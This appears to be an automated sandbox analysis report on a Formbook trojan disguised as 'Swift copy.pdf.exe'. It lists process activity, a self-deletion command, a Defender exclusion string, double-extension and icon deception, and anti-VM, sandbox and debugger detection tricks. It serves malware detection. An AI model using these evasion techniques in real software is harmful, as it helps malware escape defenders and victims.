          Source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Swift copy.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@10/7
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Swift copy.pdf.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_01
          Source: Swift copy.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Swift copy.pdf.exeVirustotal: Detection: 30%
          Source: Swift copy.pdf.exeReversingLabs: Detection: 20%
          Source: unknownProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe 'C:\Users\user\Desktop\Swift copy.pdf.exe'
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Swift copy.pdf.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exeJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Swift copy.pdf.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Swift copy.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Swift copy.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.376832719.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Swift copy.pdf.exe, 00000005.00000002.389961809.0000000001070000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Swift copy.pdf.exe, 00000005.00000002.389961809.0000000001070000.00000040.00000001.sdmp, cscript.exe
          Source: Binary string: cscript.pdb source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.376832719.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_0258308A push ss; retf 0_2_02583094
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02582AC6 push es; ret 0_2_02582AC7
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0040C296 pushfd ; retf 5_2_0040C2B1
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041B3F2 push eax; ret 5_2_0041B3F8
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041B3FB push eax; ret 5_2_0041B462
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041B3A5 push eax; ret 5_2_0041B3F8
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041B45C push eax; ret 5_2_0041B462
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004154CC push ss; iretd 5_2_004154CD
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0040AFE9 push cs; ret 5_2_0040AFEC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0498D0D1 push ecx; ret 10_2_0498D0E4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312B3A5 push eax; ret 10_2_0312B3F8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312B3F2 push eax; ret 10_2_0312B3F8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312B3FB push eax; ret 10_2_0312B462
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0311C296 pushfd ; retf 10_2_0311C2B1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0311AFE9 push cs; ret 10_2_0311AFEC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312B45C push eax; ret 10_2_0312B462
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_031254CC push ss; iretd 10_2_031254CD
          Source: initial sampleStatic PE information: section name: .text entropy: 7.95048824536

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (5001).png
          Uses an obfuscated file name to hide its real file extension (double extension)Show sources
          Source: Possible double extension: pdf.exeStatic PE information: Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Swift copy.pdf.exe PID: 6628, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000031185E4 second address: 00000000031185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000311896E second address: 0000000003118974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004088A0 rdtsc 5_2_004088A0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe TID: 6632Thread sleep time: -102883s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe TID: 6652Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2524Thread sleep time: -35000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6780Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeThread delayed: delay time: 102883Jump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000007.00000000.373852974.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000007.00000000.373819513.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000007.00000000.373679366.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000002.606371070.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.370918951.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: cscript.exe, 0000000A.00000002.591526613.00000000002EC000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000002.606371070.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000007.00000000.370918951.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.373819513.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000007.00000000.373679366.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000007.00000002.606371070.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000000.373679366.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000007.00000000.373852974.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000007.00000002.591935318.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000007.00000002.606371070.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004088A0 rdtsc 5_2_004088A0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00409B10 LdrLoadDll,5_2_00409B10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494849B mov eax, dword ptr fs:[00000030h]10_2_0494849B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939080 mov eax, dword ptr fs:[00000030h]10_2_04939080
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B3884 mov eax, dword ptr fs:[00000030h]10_2_049B3884
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B3884 mov eax, dword ptr fs:[00000030h]10_2_049B3884
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496F0BF mov ecx, dword ptr fs:[00000030h]10_2_0496F0BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496F0BF mov eax, dword ptr fs:[00000030h]10_2_0496F0BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496F0BF mov eax, dword ptr fs:[00000030h]10_2_0496F0BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h]10_2_049620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h]10_2_049620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h]10_2_049620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h]10_2_049620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h]10_2_049620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h]10_2_049620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049790AF mov eax, dword ptr fs:[00000030h]10_2_049790AF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CB8D0 mov eax, dword ptr fs:[00000030h]10_2_049CB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CB8D0 mov ecx, dword ptr fs:[00000030h]10_2_049CB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CB8D0 mov eax, dword ptr fs:[00000030h]10_2_049CB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CB8D0 mov eax, dword ptr fs:[00000030h]10_2_049CB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CB8D0 mov eax, dword ptr fs:[00000030h]10_2_049CB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CB8D0 mov eax, dword ptr fs:[00000030h]10_2_049CB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F14FB mov eax, dword ptr fs:[00000030h]10_2_049F14FB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6CF0 mov eax, dword ptr fs:[00000030h]10_2_049B6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6CF0 mov eax, dword ptr fs:[00000030h]10_2_049B6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6CF0 mov eax, dword ptr fs:[00000030h]10_2_049B6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08CD6 mov eax, dword ptr fs:[00000030h]10_2_04A08CD6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049358EC mov eax, dword ptr fs:[00000030h]10_2_049358EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7016 mov eax, dword ptr fs:[00000030h]10_2_049B7016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7016 mov eax, dword ptr fs:[00000030h]10_2_049B7016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7016 mov eax, dword ptr fs:[00000030h]10_2_049B7016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6C0A mov eax, dword ptr fs:[00000030h]10_2_049B6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6C0A mov eax, dword ptr fs:[00000030h]10_2_049B6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6C0A mov eax, dword ptr fs:[00000030h]10_2_049B6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6C0A mov eax, dword ptr fs:[00000030h]10_2_049B6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]10_2_049F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A0740D mov eax, dword ptr fs:[00000030h]10_2_04A0740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A0740D mov eax, dword ptr fs:[00000030h]10_2_04A0740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A0740D mov eax, dword ptr fs:[00000030h]10_2_04A0740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A04015 mov eax, dword ptr fs:[00000030h]10_2_04A04015
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A04015 mov eax, dword ptr fs:[00000030h]10_2_04A04015
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496BC2C mov eax, dword ptr fs:[00000030h]10_2_0496BC2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496002D mov eax, dword ptr fs:[00000030h]10_2_0496002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496002D mov eax, dword ptr fs:[00000030h]10_2_0496002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496002D mov eax, dword ptr fs:[00000030h]10_2_0496002D
